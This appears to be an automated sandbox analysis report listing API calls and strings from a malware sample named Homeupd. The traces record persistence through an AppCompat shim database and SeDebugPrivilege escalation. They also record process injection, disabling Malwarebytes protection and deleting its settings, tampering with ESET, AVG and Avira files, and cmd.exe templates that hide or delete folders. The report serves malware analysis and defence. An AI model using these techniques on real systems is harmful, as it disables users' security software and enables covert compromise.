      • Part of subcall function 018F11B1: GetProcAddress.KERNEL32(00000000), ref: 018F11CF
      • Part of subcall function 018F11B1: RegOpenKeyExA.ADVAPI32(80000002,018F36A0,00000000,00020106,?), ref: 018F11EE
      • Part of subcall function 018F11B1: RegDeleteKeyA.ADVAPI32(80000002,018F36A0), ref: 018F1215
      • Part of subcall function 018F11B1: RegCloseKey.ADVAPI32(?), ref: 018F1220
    Strings
    • SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\iscsicli.exe\, xrefs: 018F3690
    • \AppPatch\Custom\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb, xrefs: 018F3679
    • \..\..\LocalLow\, xrefs: 018F35FD
    • SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{f48a0c57-7c48-461c-9957-ab255ddc986e}\, xrefs: 018F36A0
    • "%%windir%%\system32\sdbinst.exe" /q /u "%s", xrefs: 018F3618
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetTempPathA.KERNEL32(00000104,018FF6B8), ref: 018F3536
    • lstrcatA.KERNEL32(018FF6B8,\..\..\LocalLow\), ref: 018F3542
      • Part of subcall function 018F1891: CreateFileA.KERNEL32(018F3554,40000000,00000001,00000000,00000002,00000000,00000000), ref: 018F18B1
      • Part of subcall function 018F1891: WriteFile.KERNEL32(00000000,018FF400,0000020E,?,00000000), ref: 018F18D5
      • Part of subcall function 018F1891: FlushFileBuffers.KERNEL32(00000000), ref: 018F18DE
      • Part of subcall function 018F1891: WriteFile.KERNEL32(00000000, RECTEXE,0000006C,?,00000000), ref: 018F190A
      • Part of subcall function 018F1891: FlushFileBuffers.KERNEL32(00000000), ref: 018F190D
      • Part of subcall function 018F1891: CloseHandle.KERNEL32(00000000), ref: 018F1910
      • Part of subcall function 018F19A0: lstrcpynA.KERNEL32(?,?,00000104,?,00000000), ref: 018F19E9
      • Part of subcall function 018F19A0: GetModuleHandleA.KERNEL32(00000000), ref: 018F19F3
      • Part of subcall function 018F19A0: GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 018F19FA
      • Part of subcall function 018F19A0: wsprintfA.USER32(?,start "" "%s",?,?,00000000), ref: 018F1A13
      • Part of subcall function 018F19A0: CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 018F1A2B
      • Part of subcall function 018F19A0: GetLastError.KERNEL32 ref: 018F1A38
      • Part of subcall function 018F19A0: lstrlenA.KERNEL32(?,00000000), ref: 018F1A48
      • Part of subcall function 018F19A0: WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 018F1A5E
      • Part of subcall function 018F19A0: GetLastError.KERNEL32 ref: 018F1A6D
      • Part of subcall function 018F19A0: CloseHandle.KERNEL32(00000000), ref: 018F1A76
    • DeleteFileA.KERNEL32(?), ref: 018F35C8
      • Part of subcall function 018F33C1: wvsprintfA.USER32(?,?,018F3B52), ref: 018F342D
      • Part of subcall function 018F33C1: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 018F3461
      • Part of subcall function 018F33C1: GetProcAddress.KERNEL32(00000000), ref: 018F346A
      • Part of subcall function 018F33C1: LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 018F3477
      • Part of subcall function 018F33C1: GetProcAddress.KERNEL32(00000000), ref: 018F347A
      • Part of subcall function 018F33C1: PathGetArgsA.SHLWAPI(?), ref: 018F34A9
      • Part of subcall function 018F33C1: lstrcpynA.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F34B7
      • Part of subcall function 018F33C1: ShellExecuteExA.SHELL32(?,?,?,?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3509
      • Part of subcall function 018F33C1: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3519
    • DeleteFileA.KERNEL32(?), ref: 018F35BF
      • Part of subcall function 018F14DC: GetModuleHandleA.KERNEL32(kernel32), ref: 018F14F3
      • Part of subcall function 018F14DC: GetProcAddress.KERNEL32(00000000), ref: 018F14FA
      • Part of subcall function 018F14DC: GetCurrentProcess.KERNEL32 ref: 018F1515
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • LoadLibraryA.KERNEL32(user32.dll), ref: 018F2E6C
    • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 018F2E89
    • GetProcAddress.KERNEL32(00000000,CreateSystemThreads), ref: 018F2E9A
    • FreeLibrary.KERNEL32(00000000), ref: 018F2EFC
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetCurrentProcess.KERNEL32 ref: 018F20FD
    • OpenProcessToken.ADVAPI32(00000000,?,00000000), ref: 018F2104
    • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 018F211B
    • AdjustTokenPrivileges.ADVAPI32(018F3F1A,00000000,?,00000010,00000000,00000000), ref: 018F213B
    • CloseHandle.KERNEL32(018F3F1A), ref: 018F2144
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 018F2268
    • Process32First.KERNEL32(00000000,?), ref: 018F22A0
    • lstrcmpiA.KERNEL32(?,018F3781,00000000,00000000,?,00000002,00000000), ref: 018F22B4
    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 018F22CA
      • Part of subcall function 018F2150: GetModuleHandleA.KERNEL32(00000000), ref: 018F215C
      • Part of subcall function 018F2150: VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 018F2175
      • Part of subcall function 018F2150: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 018F2187
      • Part of subcall function 018F2150: VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 018F21AB
      • Part of subcall function 018F2150: VirtualProtectEx.KERNEL32(?,018F22DF,00001000,00000040,?), ref: 018F21DD
      • Part of subcall function 018F2150: WriteProcessMemory.KERNEL32(?,018F22DF,018F22DF,00001000,?), ref: 018F21ED
      • Part of subcall function 018F2150: VirtualQueryEx.KERNEL32(?,018F22DF,?,0000001C), ref: 018F2211
      • Part of subcall function 018F2150: LoadLibraryA.KERNEL32(ntdll.dll), ref: 018F2223
      • Part of subcall function 018F2150: GetProcAddress.KERNEL32(00000000), ref: 018F222A
    • CloseHandle.KERNEL32(00000000), ref: 018F22E2
    • Process32Next.KERNEL32(00000000,00000128), ref: 018F22F0
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetUserNameA.ADVAPI32(?,?), ref: 018F1849
    • wsprintfA.USER32(019001C8,com.%s.sdb,?,?,?,018FF6B8), ref: 018F1861
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetEnvironmentVariableA.KERNEL32(ALLUSERSPROFILE,?,00000104), ref: 018F236A
    • lstrcatA.KERNEL32(?,\Malwarebytes\Malwarebytes Anti-Malware\,?,?,?,?,?,?,?,80000002), ref: 018F2382
    • GetEnvironmentVariableA.KERNEL32(ProgramData,?,00000104), ref: 018F2391
    • lstrcatA.KERNEL32(?,\Malwarebytes\Malwarebytes Anti-Malware\,?,?,?,?,?,?,?,80000002), ref: 018F23A3
    • lstrcmpA.KERNEL32(?,?,?,?,?,?,?,?,?,80000002), ref: 018F23B3
    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F23E1
    • lstrcatA.KERNEL32(?,exclusions.dat,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F23EF
    • DeleteFileA.KERNEL32(?), ref: 018F2409
    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F2444
    • lstrcatA.KERNEL32(?,Configuration\settings.conf,?,?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F2452
    • DeleteFileA.KERNEL32(?), ref: 018F246C
    • lstrcatA.KERNEL32(?,?), ref: 018F24AB
    • lstrcatA.KERNEL32(?,Configuration\scheduler.conf), ref: 018F24B9
    • DeleteFileA.KERNEL32(?), ref: 018F24D3
    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F250F
    • lstrcatA.KERNEL32(?,exclusions.dat,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F251D
      • Part of subcall function 018F152F: GetFileAttributesA.KERNEL32(018F3A22), ref: 018F1535
    • DeleteFileA.KERNEL32(?), ref: 018F2537
    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F2572
    • lstrcatA.KERNEL32(?,Configuration\settings.conf,?,?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F2580
    • DeleteFileA.KERNEL32(?), ref: 018F259A
    • lstrcatA.KERNEL32(?,?), ref: 018F25D9
    • lstrcatA.KERNEL32(?,Configuration\scheduler.conf), ref: 018F25E7
    • DeleteFileA.KERNEL32(?), ref: 018F2601
      • Part of subcall function 018F17A4: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 018F17BF
      • Part of subcall function 018F17A4: WriteFile.KERNEL32(00000000,?,018F3B8B,?,00000000), ref: 018F17DA
      • Part of subcall function 018F17A4: FlushFileBuffers.KERNEL32(00000000), ref: 018F17F1
      • Part of subcall function 018F17A4: CloseHandle.KERNEL32(00000000), ref: 018F17F8
      • Part of subcall function 018F17A4: GetLastError.KERNEL32(?,?,?,018F3B8B,?,?,00000001,?,80000002), ref: 018F1808
      • Part of subcall function 018F122C: RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,?), ref: 018F1244
      • Part of subcall function 018F122C: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000000), ref: 018F126F
      • Part of subcall function 018F122C: RegCloseKey.ADVAPI32(?), ref: 018F127A
    • lstrcatA.KERNEL32(?,C:\Program Files\Malwarebytes Anti-Malware), ref: 018F2663
    • lstrcatA.KERNEL32(?,\mbam.dll), ref: 018F2671
    • LoadLibraryA.KERNEL32(?), ref: 018F267A
    • GetProcAddress.KERNEL32(00000000,ProtectionStop), ref: 018F268E
    • GetProcAddress.KERNEL32(00000000,SchedulerStop), ref: 018F2698
    • GetProcAddress.KERNEL32(00000000,SelfProtectionDisable), ref: 018F26A3
    • Sleep.KERNEL32(000007D0), ref: 018F26C1
      • Part of subcall function 018F1545: CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 018F1554
      • Part of subcall function 018F1545: Process32First.KERNEL32(00000000,?), ref: 018F156D
      • Part of subcall function 018F1545: lstrcmpA.KERNEL32(?,018F26D1,00000000,0000000F,00000000,00000000,00000000), ref: 018F1587
      • Part of subcall function 018F1545: OpenProcess.KERNEL32(00000001,00000000,?), ref: 018F159A
      • Part of subcall function 018F1545: TerminateProcess.KERNEL32(00000000,00000009), ref: 018F15A9
      • Part of subcall function 018F1545: CloseHandle.KERNEL32(00000000), ref: 018F15B0
      • Part of subcall function 018F1545: Process32Next.KERNEL32(00000000,00000128), ref: 018F15BA
      • Part of subcall function 018F1545: CloseHandle.KERNEL32(00000000), ref: 018F15C5
    Strings
    • ProductPath, xrefs: 018F263C
    • exclusions.dat, xrefs: 018F23E3
    • SchedulerStop, xrefs: 018F2690
    • \Malwarebytes\Malwarebytes Anti-Malware\, xrefs: 018F2397
    • Configuration\scheduler.conf, xrefs: 018F24AD
    • ProgramData, xrefs: 018F238C
    • SelfProtectionDisable, xrefs: 018F269A
    • mbam.exe, xrefs: 018F26C7
    • Configuration\settings.conf, xrefs: 018F2446
    • ALLUSERSPROFILE, xrefs: 018F2365
    • Configuration\settings.conf, xrefs: 018F2574
    • \Malwarebytes\Malwarebytes Anti-Malware\, xrefs: 018F2376
    • Configuration\scheduler.conf, xrefs: 018F25DB
    • \mbam.dll, xrefs: 018F2665
    • exclusions.dat, xrefs: 018F2511
    • ProtectionStop, xrefs: 018F2688
    • C:\Program Files\Malwarebytes Anti-Malware, xrefs: 018F2657
    • SYSTEM\CurrentControlSet\services\MBAMProtector\Parameters, xrefs: 018F2641
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
      • Part of subcall function 018F26D7: RegOpenKeyExA.ADVAPI32(00000104,?,00000000,00020119,?), ref: 018F26EF
      • Part of subcall function 018F26D7: RegQueryValueExA.ADVAPI32(?,?,00000000,?), ref: 018F271A
      • Part of subcall function 018F26D7: RegCloseKey.ADVAPI32(?), ref: 018F2725
    • lstrcatA.KERNEL32(?,?,?,80000002), ref: 018F385D
    • lstrcatA.KERNEL32(?,\updfiles,?,80000002), ref: 018F386B
    • lstrcatA.KERNEL32(?,?,?,?,?,?,80000002), ref: 018F388D
    • lstrcatA.KERNEL32(?,\lastupd.ver,?,?,?,?,80000002), ref: 018F389B
    • DeleteFileA.KERNEL32(?), ref: 018F38AA
    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,80000002), ref: 018F38CC
    • lstrcatA.KERNEL32(?,\upd.ver,?,?,?,?,?,?,?,80000002), ref: 018F38DA
    • DeleteFileA.KERNEL32(?), ref: 018F38E3
      • Part of subcall function 018F152F: GetFileAttributesA.KERNEL32(018F3A22), ref: 018F1535
    • Sleep.KERNEL32(00001B58), ref: 018F3915
      • Part of subcall function 018F33C1: wvsprintfA.USER32(?,?,018F3B52), ref: 018F342D
      • Part of subcall function 018F33C1: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 018F3461
      • Part of subcall function 018F33C1: GetProcAddress.KERNEL32(00000000), ref: 018F346A
      • Part of subcall function 018F33C1: LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 018F3477
      • Part of subcall function 018F33C1: GetProcAddress.KERNEL32(00000000), ref: 018F347A
      • Part of subcall function 018F33C1: PathGetArgsA.SHLWAPI(?), ref: 018F34A9
      • Part of subcall function 018F33C1: lstrcpynA.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F34B7
      • Part of subcall function 018F33C1: ShellExecuteExA.SHELL32(?,?,?,?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3509
      • Part of subcall function 018F33C1: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3519
    • Sleep.KERNEL32(00001B58), ref: 018F392B
    • Sleep.KERNEL32(00001B58), ref: 018F3941
    • Sleep.KERNEL32(00001B58), ref: 018F3957
    • Sleep.KERNEL32(00001B58), ref: 018F396D
    • Sleep.KERNEL32(00001B58), ref: 018F3983
    • Sleep.KERNEL32(00001B58), ref: 018F3999
    Strings
    • cmd.exe /c md "%s", xrefs: 018F394A
    • cmd.exe /c attrib +R +S +H /D /S "%s", xrefs: 018F3934
    • cmd.exe /c rmdir /S /Q "%s", xrefs: 018F38FD
    • cmd.exe /c md "%s", xrefs: 018F391E
    • \updfiles, xrefs: 018F385F
    • SOFTWARE\ESET\ESET Security\CurrentVersion\Info, xrefs: 018F381C
    • AppDataDir, xrefs: 018F3817
    • cmd.exe /c attrib +R +S +H /D /S "%s", xrefs: 018F398C
    • cmd.exe /c md "%s", xrefs: 018F3976
    • cmd.exe /c attrib +R +S +H /D /S "%s", xrefs: 018F3960
    • \upd.ver, xrefs: 018F38CE
    • \lastupd.ver, xrefs: 018F388F
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
      • Part of subcall function 018F26D7: RegOpenKeyExA.ADVAPI32(00000104,?,00000000,00020119,?), ref: 018F26EF
      • Part of subcall function 018F26D7: RegQueryValueExA.ADVAPI32(?,?,00000000,?), ref: 018F271A
      • Part of subcall function 018F26D7: RegCloseKey.ADVAPI32(?), ref: 018F2725
    • lstrcpyA.KERNEL32(?,?,?,80000002), ref: 018F3A00
    • lstrcatA.KERNEL32(?,\Avg2015\,?,80000002), ref: 018F3A14
      • Part of subcall function 018F152F: GetFileAttributesA.KERNEL32(018F3A22), ref: 018F1535
    • lstrcpyA.KERNEL32(?,?,?,?,?,?,80000002), ref: 018F3A4B
    • lstrcatA.KERNEL32(?,\Avg2014\,?,?,?,?,80000002), ref: 018F3A59
    • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,80000002), ref: 018F3A90
    • lstrcatA.KERNEL32(?,\Avg2013\,?,?,?,?,?,?,?,80000002), ref: 018F3A9E
    • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F3AD1
    • lstrcatA.KERNEL32(?,\Avg2012\,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F3ADF
    • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F3B12
    • lstrcatA.KERNEL32(?,\Avg2011\,?,?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 018F3B20
    • lstrcatA.KERNEL32(?,update,?,80000002), ref: 018F3B2E
    • Sleep.KERNEL32(00001B58), ref: 018F3B59
    • CreateDirectoryA.KERNEL32(?,00000000), ref: 018F3B68
    • lstrcatA.KERNEL32(?,\download,?,80000002), ref: 018F3B7A
      • Part of subcall function 018F17A4: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 018F17BF
      • Part of subcall function 018F17A4: WriteFile.KERNEL32(00000000,?,018F3B8B,?,00000000), ref: 018F17DA
      • Part of subcall function 018F17A4: FlushFileBuffers.KERNEL32(00000000), ref: 018F17F1
      • Part of subcall function 018F17A4: CloseHandle.KERNEL32(00000000), ref: 018F17F8
      • Part of subcall function 018F17A4: GetLastError.KERNEL32(?,?,?,018F3B8B,?,?,00000001,?,80000002), ref: 018F1808
      • Part of subcall function 018F33C1: wvsprintfA.USER32(?,?,018F3B52), ref: 018F342D
      • Part of subcall function 018F33C1: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 018F3461
      • Part of subcall function 018F33C1: GetProcAddress.KERNEL32(00000000), ref: 018F346A
      • Part of subcall function 018F33C1: LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 018F3477
      • Part of subcall function 018F33C1: GetProcAddress.KERNEL32(00000000), ref: 018F347A
      • Part of subcall function 018F33C1: PathGetArgsA.SHLWAPI(?), ref: 018F34A9
      • Part of subcall function 018F33C1: lstrcpynA.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F34B7
      • Part of subcall function 018F33C1: ShellExecuteExA.SHELL32(?,?,?,?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3509
      • Part of subcall function 018F33C1: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3519
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 018F2CD5
    • GetLastError.KERNEL32(?,00000000), ref: 018F2CE0
    • GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 018F2CF2
    • GetLastError.KERNEL32(?,00000000), ref: 018F2CFD
    • GetProcAddress.KERNEL32(00000000,ZwAllocateVirtualMemory), ref: 018F2D09
    • GetLastError.KERNEL32(?,00000000), ref: 018F2D14
      • Part of subcall function 018F2BD1: LocalAlloc.KERNEL32(00000040,?), ref: 018F2BF9
      • Part of subcall function 018F2BD1: GetLastError.KERNEL32(?,00000000), ref: 018F2C05
      • Part of subcall function 018F2BD1: StrStrIA.SHLWAPI(00000020,018F69EC), ref: 018F2C33
      • Part of subcall function 018F2BD1: StrStrIA.SHLWAPI(00000020,exe), ref: 018F2C42
      • Part of subcall function 018F2BD1: LocalFree.KERNEL32(00000000), ref: 018F2C72
    • LoadLibraryA.KERNEL32(?), ref: 018F2D30
    • GetLastError.KERNEL32(?,00000000), ref: 018F2D38
    • GetProcAddress.KERNEL32(00000000,PsLookupProcessByProcessId), ref: 018F2D44
    • GetCurrentProcessId.KERNEL32 ref: 018F2D4F
    • FreeLibrary.KERNEL32(?), ref: 018F2D67
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • wvsprintfA.USER32(?,?,018F3B52), ref: 018F342D
    • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 018F3461
    • GetProcAddress.KERNEL32(00000000), ref: 018F346A
    • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 018F3477
    • GetProcAddress.KERNEL32(00000000), ref: 018F347A
    • PathGetArgsA.SHLWAPI(?), ref: 018F34A9
    • lstrcpynA.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F34B7
    • ShellExecuteExA.SHELL32(?,?,?,?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3509
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3519
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
      • Part of subcall function 018F26D7: RegOpenKeyExA.ADVAPI32(00000104,?,00000000,00020119,?), ref: 018F26EF
      • Part of subcall function 018F26D7: RegQueryValueExA.ADVAPI32(?,?,00000000,?), ref: 018F271A
      • Part of subcall function 018F26D7: RegCloseKey.ADVAPI32(?), ref: 018F2725
    • lstrcpyA.KERNEL32(?,?), ref: 018F3C4A
    • lstrcatA.KERNEL32(?,\TEMP\avwin.ini), ref: 018F3C5E
    • DeleteFileA.KERNEL32(?), ref: 018F3C67
      • Part of subcall function 018F17A4: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 018F17BF
      • Part of subcall function 018F17A4: WriteFile.KERNEL32(00000000,?,018F3B8B,?,00000000), ref: 018F17DA
      • Part of subcall function 018F17A4: FlushFileBuffers.KERNEL32(00000000), ref: 018F17F1
      • Part of subcall function 018F17A4: CloseHandle.KERNEL32(00000000), ref: 018F17F8
      • Part of subcall function 018F17A4: GetLastError.KERNEL32(?,?,?,018F3B8B,?,?,00000001,?,80000002), ref: 018F1808
    • lstrcpyA.KERNEL32(?,018F6624), ref: 018F3CA1
    • lstrcatA.KERNEL32(?,?), ref: 018F3CB1
    • lstrcatA.KERNEL32(?,avconfig.exe" /SAVEAVWININI="avwin.ini;"), ref: 018F3CBF
      • Part of subcall function 018F33C1: wvsprintfA.USER32(?,?,018F3B52), ref: 018F342D
      • Part of subcall function 018F33C1: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 018F3461
      • Part of subcall function 018F33C1: GetProcAddress.KERNEL32(00000000), ref: 018F346A
      • Part of subcall function 018F33C1: LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 018F3477
      • Part of subcall function 018F33C1: GetProcAddress.KERNEL32(00000000), ref: 018F347A
      • Part of subcall function 018F33C1: PathGetArgsA.SHLWAPI(?), ref: 018F34A9
      • Part of subcall function 018F33C1: lstrcpynA.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F34B7
      • Part of subcall function 018F33C1: ShellExecuteExA.SHELL32(?,?,?,?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3509
      • Part of subcall function 018F33C1: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3519
    Strings
    • \TEMP\avwin.ini, xrefs: 018F3C52
    • avconfig.exe" /SAVEAVWININI="avwin.ini;", xrefs: 018F3CB3
    • SOFTWARE\Avira\Antivir Desktop, xrefs: 018F3BE7
    • Path, xrefs: 018F3C0A
    • ########################################################## $AV$CONFIGURATION$INI##############################################, xrefs: 018F3C78
    • AppDataDirectory, xrefs: 018F3BE2
    • SOFTWARE\Avira\Antivir Desktop, xrefs: 018F3C0F
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetTempPathA.KERNEL32(00000104,?), ref: 018F2814
    • lstrcatA.KERNEL32(?,018F6800,?,?,00000000), ref: 018F282C
    • lstrcatA.KERNEL32(?,018F3251,?,?,00000000), ref: 018F2838
      • Part of subcall function 018F2743: CreateFileA.KERNEL32(018F3EC4,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 018F275B
      • Part of subcall function 018F2743: GetProcessHeap.KERNEL32 ref: 018F2773
      • Part of subcall function 018F2743: HeapAlloc.KERNEL32(00000000,?,?,?,?,018F2856,?,018F8000,00005A00,018F3EC4,00000022,?,?,00000000), ref: 018F2776
      • Part of subcall function 018F2743: SetFilePointer.KERNEL32(00000022,00000000,00000000,00000000), ref: 018F27A3
      • Part of subcall function 018F2743: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 018F27B4
      • Part of subcall function 018F2743: GetProcessHeap.KERNEL32 ref: 018F27BF
      • Part of subcall function 018F2743: HeapFree.KERNEL32(00000000,?,?,00000000), ref: 018F27C2
